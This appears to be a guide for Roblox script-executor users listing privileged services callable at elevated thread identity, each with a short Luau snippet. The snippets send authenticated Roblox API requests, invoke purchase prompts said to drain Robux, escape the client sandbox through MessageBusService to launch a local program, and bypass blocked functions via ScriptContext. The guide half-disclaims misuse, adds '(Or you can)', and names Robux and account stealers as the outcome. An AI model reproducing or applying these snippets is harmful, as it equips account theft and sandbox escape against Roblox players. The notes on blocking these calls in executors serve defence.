Warning: This information is provided to raise awareness about potential vulnerabilities. Do not attempt to exploit or misuse any of the following information. (Or you can)
HttpRbxApiService
You can abuse the HttpRbxApiService Service of Roblox that is normally only accessible by CoreScripts but since Executors have the thread level of 8, you have the permissions to use the service!
-- LuaU code to grab the amount of robux that the user has
local robux = game:GetService("HttpRbxApiService"):GetAsyncFullUrl("https://economy.roblox.com/v1/user/currency")
print(robux)
This code sends an account authenticated request to the Roblox API to grab the amount of robux that the user has, and it can be abused to steal robux and account information.
BrowserService
Roblox's BrowserService was again, only meant to be accessed by CoreScripts. Using this service will open up a ton of critical vulnerabilities, such as cookie grabbing, auto downloading malicious files, executing JavaScript that may potentially be malicious, and more.
-- LuaU code to open a Google URL using BrowserService
game:GetService("BrowserService"):OpenBrowserWindow('https://google.com')
This code uses the BrowserService to open a Google URL. Abusing BrowserService can lead to critical vulnerabilities like cookie grabbing and executing potentially malicious JavaScript.
GuiService
Just like HttpRbxApiService, GuiService can be abused to send authenticated requests to the Roblox API.
-- LuaU code to open a Google URL using GuiService
game:GetService("GuiService"):OpenBrowserWindow('https://google.com/')
This code uses the GuiService to open a Google URL. GuiService, like BrowserService, can be abused to send authenticated requests to the Roblox API.
MarketplaceService
The service MarketplaceService has a lot of functions that can be used to steal a Roblox Account's Robux.
local m = game:GetService("MarketplaceService")
-- gets the account's balance and prints it
local r = m:GetRobuxBalance()
print(r)
-- below can be used to steal robux
-- if you wish to see the function's required parameters, check the docs: https://robloxapi.github.io/ref/class/MarketplaceService.html
m:PerformPurchase()
m:PerformPurchaseV2()
m:PromptNativePurchaseWithLocalPlayer()
m:PromptNativePurchase()
m:PromptCollectiblesPurchase()
m:PromptGamePassPurchase()
m:PromptBundlePurchase()
m:PromptThirdPartyPurchase()
m:PromptRobloxPurchase()
m:PromptProductPurchase()
m:PromptPurchase()
-- in the docs, there are also signals that could be potentially fired by an executor's firesignal function. if you have already done blocking the other functions above in your executor, consider blocking firesignal from firing those malicious signals.
This code demonstrates various functions in MarketplaceService that can be abused to steal a Roblox Account's Robux. Be cautious and avoid using these functions.
HttpService
You've probably already tried sending requests to the Roblox API with HttpService at one point, and it throws the error "HttpService can't access ROBLOX resources." But did you know that there is an unrestricted function in HttpService, allowing you to send authenticated requests to the API, resulting in Robux Stealer Scripts? Introducing: RequestInternal!
-- LuaU code to send an authenticated request to the Roblox API using RequestInternal
game:GetService("HttpService"):RequestInternal({Url = "https://www.google.com/"})
This code demonstrates the use of RequestInternal in HttpService to send authenticated requests to the Roblox API. Exercise caution as this can lead to unauthorized access.
OpenCloudService
OpenCloudService is a new Service added to Roblox, and again, it allowed you to send authenticated requests to the Roblox API.
-- LuaU code to send an authenticated request to the Roblox API using OpenCloudService
game:GetService("OpenCloudService"):HttpRequestAsync({Url = 'https://google.com'})
This code uses OpenCloudService to send an authenticated request to the Roblox API. Be aware of potential security risks associated with abusing this service.
MessageBusService
We can abuse MessageBusService to access the openUrlRequest messages which lets us escape the sandbox, resulting in an RCE or Remote Code Execution vulnerability.
-- LuaU code to publish openURLRequest messages and potentially escape the sandbox
game:GetService("MessageBusService"):Publish(game:GetService("MessageBusService"):GetMessageId("Linking", "openURLRequest"), {url = "notepad.exe"})
This code abuses MessageBusService to access openUrlRequest messages, potentially leading to Remote Code Execution (RCE) vulnerabilities. Avoid such practices to ensure a secure environment.
game:HttpGet
In most Roblox loadstring scripts, you might've seen "game:HttpGet" after it. That's the function that sends the GET request to a specific URL to grab a script, and loadstring is the one that looks for LuaU code in the URL provided. This can be abused by sending authenticated requests to the Roblox API, resulting in Robux Stealers, Account Stealers and more.
-- LuaU code to send authenticated requests to the Roblox API using game:HttpGet
game:HttpGet('REPLACE THIS WITH ROBLOX API URL')
This code showcases the use of game:HttpGet to send authenticated requests to the Roblox API. Be cautious as this can lead to the creation of scripts for stealing Robux and accounts.
request Function
The Roblox Unified Naming Convention (UNC) has a custom function called "request," its alias can be http_request, http, syn.request, and more. And since 99% of executors support UNC, this becomes critical. This can be abused to send authenticated requests to the Roblox API.
-- LuaU code to send authenticated requests to the Roblox API using the request function
request({
Url = 'https://google.com',
Method = 'GET' -- u can use post
})
-- For POST requests, add the application/json header
This code demonstrates the use of the "request" function, following the Unified Naming Convention (UNC), to send authenticated requests to the Roblox API. Exercise caution due to its potential for unauthorized access.
Bypassing blocked functions with ScriptContext
CHECK James Napora's Github Gist FOR MORE INFORMATION Basically, this uses ScriptContext to create a CoreScript and parent it to an actor and elevating its thread identity to 8, allowing you to use the functions above even if they were blocked.
-- LuaU code to bypass blocked functions using ScriptContext
game:GetService("ScriptContext"):AddCoreScriptLocal("CoreScripts/ProximityPrompt", actor)
This code highlights a method to bypass blocked functions using ScriptContext, potentially enabling the use of functions even if they were blocked. Understand the associated risks and avoid such practices for security reasons.